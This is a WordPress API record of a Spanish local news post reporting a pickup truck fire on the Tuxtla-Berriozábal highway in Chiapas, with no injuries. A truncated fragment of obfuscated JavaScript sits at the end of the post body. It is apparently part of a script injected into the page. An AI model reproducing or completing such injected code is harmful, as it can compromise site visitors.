{"id":16534,"date":"2024-07-05T03:12:36","date_gmt":"2024-07-05T03:12:36","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=16534"},"modified":"2024-07-05T03:12:38","modified_gmt":"2024-07-05T03:12:38","slug":"se-incendia-camioneta-en-el-tramo-tuxtla-berriozabal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=16534","title":{"rendered":"Se incendia camioneta en el tramo Tuxtla-Berrioz\u00e1bal"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"16535\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1720148952894-1024x768.jpg\" alt=\"\" class=\"wp-image-16535\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1720148952894-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1720148952894-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1720148952894-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1720148952894.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"16536\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1720148961762-1024x768.jpg\" alt=\"\" class=\"wp-image-16536\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1720148961762-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1720148961762-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1720148961762-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/FB_IMG_1720148961762.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 4 de julio del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este mi\u00e9rcoles por la noche se incendi\u00f3 una camioneta cuando circulaba en el tramo Tuxtla-Berrioz\u00e1bal, a la altura del punto de revisi\u00f3n conocido la Rampa de la Pochota.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando el conductor de la Chevrolet Trailbraizer de color rojo observ\u00f3 que sal\u00eda mucho humo de la parte del cofre.<\/p>\n\n\n\n<p>Al detenerse para hacer una inspecci\u00f3n observ\u00f3 las llamas y marc\u00f3 a los n\u00fameros de emergencia para pedir ayuda.<\/p>\n\n\n\n<p>Al lugar arribaron elementos del Cuerpo de Bomberos para apagar el fuego.<\/p>\n\n\n\n<p>El incendio no dej\u00f3 v\u00edctimas, \u00fanicamente da\u00f1os materiales en la parte delantera de la camioneta.<\/p>\n\n\n\n<p>Finalmente, una gr\u00faa particular traslad\u00f3 la unidad al domicilio del afectado.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 4 de julio del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este mi\u00e9rcoles por la noche se incendi\u00f3 una camioneta cuando circulaba en el tramo Tuxtla-Berrioz\u00e1bal, a la altura del punto de revisi\u00f3n conocido la Rampa de la Pochota. De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando el conductor de la Chevrolet &hellip;<\/p>\n","protected":false},"author":2,"featured_media":16536,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-16534","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16534","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16534"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16534\/revisions"}],"predecessor-version":[{"id":16537,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16534\/revisions\/16537"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/16536"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16534"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16534"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16534"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}